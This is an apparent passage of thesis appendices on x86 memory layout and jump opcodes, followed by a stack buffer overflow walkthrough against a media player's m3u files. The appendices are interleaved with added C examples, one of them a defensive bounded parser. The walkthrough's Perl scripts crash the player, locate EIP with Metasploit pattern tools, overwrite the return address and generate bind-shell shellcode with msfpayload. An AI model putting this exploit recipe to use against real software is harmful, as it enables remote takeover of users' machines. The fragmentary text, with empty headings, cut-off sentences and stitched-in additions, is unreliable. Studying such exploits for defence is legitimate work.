This segment corresponds to the part of the binary executable file that holds the instructions (machine code) which perform the program's tasks. The segment is marked read-only, and writing to it raises an error. Its size is fixed at run time, when the process is first loaded.
1.2. The .data segment
1.3. The .bss segment
The "below stack section" (.bss) is used to store global variables that are not given an initial value, such as: int a;
The size of this segment is also fixed when the program is executed.
1.4. The heap segment
1.5. The stack segment
2.
Code segment: the instruction code that directs the processor's execution (EIP points to the next instruction to be executed).
Stack segment: used to pass data and arguments into functions,
2.1.
...and is used to store data.
EDX (data): the extension register of EAX. It allows more complex calculations (multiply, divide) by providing extra storage for the data involved in the calculation (for example, the quotient is stored in EAX and the remainder in EDX).
2.2. Process Memory
Location of the main executable
Points to the loader data (used to display all DLLs/modules loaded in the process)
Location of the PEB in memory
The text segment in the program image is read-only and contains only application code, which restricts modification of the application code. The data segment is used to store global and static variables; it is used to initialise global variables, strings and constants. The data segment is writable and has a fixed size. The heap segment is used for the rest of the program's variables; it can grow larger or smaller than planned. All memory in the heap is managed by an allocation algorithm and a reclamation algorithm. A memory region is reserved by the algorithm. The heap grows toward higher addresses.
In a DLL, the code, the imports (the list of functions used by the DLL or by other DLLs and the application) and the exports are part of the .text segment.
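As an added illustration of the segments described in this appendix (example code written for this edit, not part of the thesis), the following C program places one constructed object in each region and checks the properties the text states: .bss is zero-filled by the loader, .data is writable, heap memory is separate from the fixed image sections, and the image is laid out text, then data, then bss. The text/data/bss ordering is an assumption about the usual linker layout, not a guarantee of the C language, and the sample variable names are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Constructed sample objects, one for each region the appendix describes. */
int data_global = 42;   /* initialised global: lives in .data */
int bss_global;         /* uninitialised global ("int a;"): lives in .bss, zero-filled at load */

/* Any function's code lives in the read-only .text segment. */
int text_marker(void) { return 1; }

/* The loader zero-fills .bss, so an uninitialised global reads as 0 without being set. */
int bss_is_zero_filled(void) { return bss_global == 0; }

/* .data is writable: change the global, read the change back, then restore it. */
int data_is_writable(void) {
    int before = data_global;
    data_global = before + 1;
    int changed = (data_global == before + 1);
    data_global = before;
    return changed;
}

/* Heap memory comes from the allocator, not from the fixed-size image sections. */
int heap_is_outside_image(void) {
    int *p = malloc(sizeof *p);
    if (p == NULL) return 0;
    int ok = (p != &data_global) && (p != &bss_global);
    free(p);
    return ok;
}

/* Within the loaded image, .text comes before .data, which comes before .bss.
   This is the usual linker ordering (assumption), not a language guarantee. */
int image_order_is_text_data_bss(void) {
    uintptr_t text = (uintptr_t)text_marker;
    uintptr_t data = (uintptr_t)&data_global;
    uintptr_t bss  = (uintptr_t)&bss_global;
    return text < data && data < bss;
}

/* Locals live in the stack segment, separate from the image's data sections. */
int stack_is_separate(void) {
    int local = 0;
    uintptr_t sp = (uintptr_t)&local;
    return sp != (uintptr_t)&data_global && sp != (uintptr_t)&bss_global;
}

int main(void) {
    int local = 0;
    int *heap = malloc(sizeof *heap);
    printf(".text  (function)   %p\n", (void *)(uintptr_t)text_marker);
    printf(".data  (int = 42)   %p\n", (void *)&data_global);
    printf(".bss   (int a;)     %p  value %d\n", (void *)&bss_global, bss_global);
    printf("heap   (malloc)     %p\n", (void *)heap);
    printf("stack  (local)      %p\n", (void *)&local);
    free(heap);
    return 0;
}
```

Running the program prints the five addresses; on a typical build the function address is the lowest, the two globals sit just above it in the image, the malloc result is further up, and the local is at a much higher address in the stack region. A write through a pointer into .text would fault, which is the read-only property the appendix describes.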
APPENDIX 3
...contains last-minute information that is not in the program's usage documentation. The typical name of this file.
instance methods: object-oriented methods, used in object-oriented programming languages.
NOP (No Operation Performed): on encountering this instruction the program passes over it without performing any action.
...machine language; it tells the machine which operations to carry out. The opcode format depends on the type of machine and on the language the machine's processor can recognise.
Payload: the main data portion. Here the payload is the shellcode provided by Metasploit.
Devcpp: a computer program that supports writing and compiling the C/C++ programming languages.
APPENDIX 4
Code           Mnemonic         Description
77 cb          JA rel8
73 cb          JAE rel8
72 cb          JB rel8
76 cb          JBE rel8
72 cb          JC rel8
E3 cb          JCXZ rel8
E3 cb          JECXZ rel8
74 cb          JE rel8
7F cb          JG rel8
7D cb          JGE rel8
7C cb          JL rel8
7E cb          JLE rel8
76 cb          JNA rel8
72 cb          JNAE rel8
73 cb          JNB rel8
77 cb          JNBE rel8
73 cb          JNC rel8
75 cb          JNE rel8
7E cb          JNG rel8
7C cb          JNGE rel8
7D cb          JNL rel8
7F cb          JNLE rel8
71 cb          JNO rel8
7B cb          JNP rel8
79 cb          JNS rel8
75 cb          JNZ rel8
70 cb          JO rel8
7A cb          JP rel8
7A cb          JPE rel8
7B cb          JPO rel8
78 cb          JS rel8
74 cb          JZ rel8
0F 87 cw/cd    JA rel16/32
0F 83 cw/cd    JAE rel16/32
0F 82 cw/cd    JB rel16/32
0F 86 cw/cd    JBE rel16/32
0F 82 cw/cd    JC rel16/32
0F 84 cw/cd    JE rel16/32
0F 84 cw/cd    JZ rel16/32
0F 8F cw/cd    JG rel16/32
0F 8D cw/cd    JGE rel16/32
0F 8C cw/cd    JL rel16/32
0F 8E cw/cd    JLE rel16/32
0F 86 cw/cd    JNA rel16/32
0F 82 cw/cd    JNAE rel16/32
0F 83 cw/cd    JNB rel16/32
0F 87 cw/cd    JNBE rel16/32
0F 83 cw/cd    JNC rel16/32
0F 85 cw/cd    JNE rel16/32
0F 8E cw/cd    JNG rel16/32
0F 8C cw/cd    JNGE rel16/32
0F 8D cw/cd    JNL rel16/32
0F 8F cw/cd    JNLE rel16/32
0F 81 cw/cd    JNO rel16/32
0F 8B cw/cd    JNP rel16/32
0F 89 cw/cd    JNS rel16/32
0F 85 cw/cd    JNZ rel16/32
0F 80 cw/cd    JO rel16/32
0F 8A cw/cd    JP rel16/32
0F 8A cw/cd    JPE rel16/32
0F 8B cw/cd    JPO rel16/32
0F 88 cw/cd    JS rel16/32
0F 84 cw/cd    JZ rel16/32
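Added example (written for this edit, not code from the thesis): a small decoder for the conditional-jump encodings listed in the table above. It shows how the low nibble of the 7x / 0F 8x opcode byte selects the condition, why the aliases in the table (JZ/JE, JNAE/JB/JC, JNBE/JA, and so on) share one opcode, and how the rel8 / rel32 displacement is added to the address of the instruction that follows the jump to obtain the target. The byte sequences and the 0x1000 base address are constructed samples, not bytes taken from any real binary.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result of decoding one conditional jump. */
typedef struct {
    const char *mnemonic;  /* canonical name from the table, NULL if no match */
    size_t length;         /* encoded length in bytes: 2 (short) or 6 (near) */
    uint32_t target;       /* absolute target = address after the jump + displacement */
} jcc_t;

/* One canonical name per condition code (low nibble of 7x / 0F 8x). The table
   above lists the aliases that share an opcode: JZ=JE, JNZ=JNE, JC=JNAE=JB,
   JNC=JNB=JAE, JNA=JBE, JNBE=JA, JNGE=JL, JNL=JGE, JNG=JLE, JNLE=JG, JPE=JP, JPO=JNP. */
static const char *const cond_names[16] = {
    "JO", "JNO", "JB", "JAE", "JE", "JNE", "JBE", "JA",
    "JS", "JNS", "JP", "JNP", "JL", "JGE", "JLE", "JG"
};

/* Decode the instruction at code[0], which is located at address ip.
   Short forms 7x cb and E3 cb (JECXZ in 32-bit mode) carry a signed 8-bit
   displacement; the near form 0F 8x cd carries a signed 32-bit displacement.
   The displacement is relative to the END of the jump instruction, so a
   negative displacement can branch back over the jump itself. */
jcc_t decode_jcc(const uint8_t *code, size_t len, uint32_t ip) {
    jcc_t r = { NULL, 0, 0 };
    if (len >= 2 && (code[0] & 0xF0) == 0x70) {
        r.mnemonic = cond_names[code[0] & 0x0F];
        r.length = 2;
        r.target = ip + 2 + (uint32_t)(int32_t)(int8_t)code[1];
    } else if (len >= 2 && code[0] == 0xE3) {
        r.mnemonic = "JECXZ";
        r.length = 2;
        r.target = ip + 2 + (uint32_t)(int32_t)(int8_t)code[1];
    } else if (len >= 6 && code[0] == 0x0F && (code[1] & 0xF0) == 0x80) {
        /* little-endian 32-bit displacement, assembled byte by byte so the
           decoder does not depend on host endianness */
        uint32_t rel = (uint32_t)code[2] | ((uint32_t)code[3] << 8) |
                       ((uint32_t)code[4] << 16) | ((uint32_t)code[5] << 24);
        r.mnemonic = cond_names[code[1] & 0x0F];
        r.length = 6;
        r.target = ip + 6 + rel;   /* unsigned wrap-around gives the signed result */
    }
    return r;
}

int main(void) {
    /* constructed byte sequences at a constructed address of 0x1000 */
    const uint8_t samples[][6] = {
        { 0x74, 0x05 },                          /* JE  +5           */
        { 0x75, 0xFE },                          /* JNE -2: to itself */
        { 0x0F, 0x84, 0x10, 0x00, 0x00, 0x00 },  /* JE  near +0x10   */
        { 0x0F, 0x8C, 0xF0, 0xFF, 0xFF, 0xFF },  /* JL  near -0x10   */
    };
    const size_t lens[] = { 2, 2, 6, 6 };
    for (size_t i = 0; i < 4; i++) {
        jcc_t j = decode_jcc(samples[i], lens[i], 0x1000);
        printf("%-5s len=%zu target=0x%08x\n", j.mnemonic, j.length, j.target);
    }
    return 0;
}
```

Because the same condition nibble appears in both the short and the near encoding, one 16-entry name table serves both forms; the table above is simply that mapping written out with every alias spelled separately.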
APPENDIX 5
Try with 10000 A's: "A" x 10000
Try with 20000 A's: "A" x 20000
Try with 30000 A's: "A" x 30000
my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = "B" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
EIP=42424242. Conclusion: EIP lies somewhere between offsets 25000 and 30000.
Determine the exact position of EIP using the two tools pattern_create.rb and pattern_offset.rb in the tools directory of Metasploit Framework 3.
Step 6: start BackTrack and go to the directory /pentest/exploits/framework/tools
./pattern_create.rb 5000
Take the result and put it into $junk2 in the next step.
Step 7: change the Perl code
my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = "...";   # put the 5000 characters just generated here
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
Step 8: use ./pattern_offset.rb 0x356A4234 5000
1064 -> EIP is at position 26065
Step 9: change the Perl code to pinpoint EIP
my $file= "eipcrash.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";
Step 10: find memory space to hold the shellcode
Use the Perl code with a simulated shellcode 144 characters long (it may be more or less)
my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Now we control EIP.
my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = pack('V',0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = pack('V',0x01a4f23a);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Runs successfully. However, if the address written into EIP contains null bytes, we must use another way to jump to the shellcode.
Step 15: obtain the shellcode to complete the exploit
Open BackTrack and type the following commands
cd ~
msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 R | msfencode -e x86/alpha_upper -t perl
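The steps above crash the player by handing it an m3u entry far longer than the buffer it is copied into. As an added defender-side example (written for this edit, not code from the thesis or from the affected player), here is that pattern in C beside a bounded replacement: the unsafe loader is shown for contrast only and is never called, while the hardened loader measures the entry, refuses anything that does not fit, and the parser counts how many entries were rejected. The 260-byte buffer size, the file names and the playlist text are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed fixed-size buffer, standing in for the player's path buffer. */
#define PATH_MAX_LEN 260

/* VULNERABLE pattern, kept only for contrast and never called in this file:
   the playlist entry is copied into a fixed stack buffer with no length check,
   so an entry longer than the buffer overwrites the saved EBP and return
   address, which is exactly what the 26064 "A"s above do. */
int load_entry_unsafe(const char *entry) {
    char path[PATH_MAX_LEN];
    strcpy(path, entry);               /* no bound */
    return (int)strlen(path);
}

/* Hardened version: measure first, refuse entries that do not fit, and copy
   with an explicit bound. Returns the entry length, or -1 when rejected. */
int load_entry_safe(const char *entry, size_t entry_len, char *out, size_t out_len) {
    if (entry_len >= out_len) return -1;   /* leave room for the terminator */
    memcpy(out, entry, entry_len);
    out[entry_len] = '\0';
    return (int)entry_len;
}

/* Walks an m3u text line by line, skipping comment (#) and blank lines, and
   loads each entry through the bounded loader. Returns the number of entries
   accepted; *rejected (if not NULL) receives the number refused as too long. */
int parse_m3u(const char *text, int *rejected) {
    int accepted = 0, refused = 0;
    char path[PATH_MAX_LEN];
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t raw = nl ? (size_t)(nl - p) : strlen(p);   /* line without '\n' */
        size_t len = raw;
        if (len > 0 && p[len - 1] == '\r') len--;          /* tolerate CRLF */
        if (len > 0 && p[0] != '#') {
            if (load_entry_safe(p, len, path, sizeof path) < 0) refused++;
            else accepted++;
        }
        p += raw + (nl ? 1 : 0);
    }
    if (rejected) *rejected = refused;
    return accepted;
}

/* Builds a constructed playlist: one normal entry plus one entry of n 'A's
   (the shape of crash25000.m3u). Returns the accepted count, sets *rejected. */
int parse_constructed_playlist(size_t n, int *rejected) {
    const char *head = "#EXTM3U\r\nC:\\music\\song.mp3\r\n";
    size_t head_len = strlen(head);
    char *text = malloc(head_len + n + 2);
    if (!text) return -1;
    memcpy(text, head, head_len);
    memset(text + head_len, 'A', n);
    text[head_len + n] = '\n';
    text[head_len + n + 1] = '\0';
    int accepted = parse_m3u(text, rejected);
    free(text);
    return accepted;
}

/* Number of entries the bounded loader refuses for the constructed playlist. */
int rejected_count_for(size_t n) {
    int r = 0;
    parse_constructed_playlist(n, &r);
    return r;
}

int main(void) {
    int rejected = 0;
    int accepted = parse_constructed_playlist(26064, &rejected);
    printf("accepted=%d rejected=%d\n", accepted, rejected);
    return 0;
}
```

With the 26064-byte entry the hardened parser reports one accepted entry and one rejected one and keeps running; the unsafe loader, given the same input, would have overwritten the return address as the crash screenshots in the thesis show. Refusing rather than silently truncating also leaves an auditable count of malformed entries, which is the signal a defender would want logged.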
[1] Appendix 3, page 89
[2] Appendix 1, page 85
[3] Appendix 3, page 89
[4] Appendix 2, page 87
[5] Appendix 3, page 89
[6] Appendix 3, page 89
[7] Appendix 3, page 89
[8] Appendix 1, page 85
[9] Appendix 3, page 89
[10] Appendix 1, page 85
[11] Appendix 1, page 85
[12] Appendix 3, page 89
[13] Appendix 3, page 89
[14] Appendix 3, page 89
[15] Appendix 3, page 89
[16] Appendix 3, page 89
[17] Appendix 3, page 89
[18] Appendix 4, page 90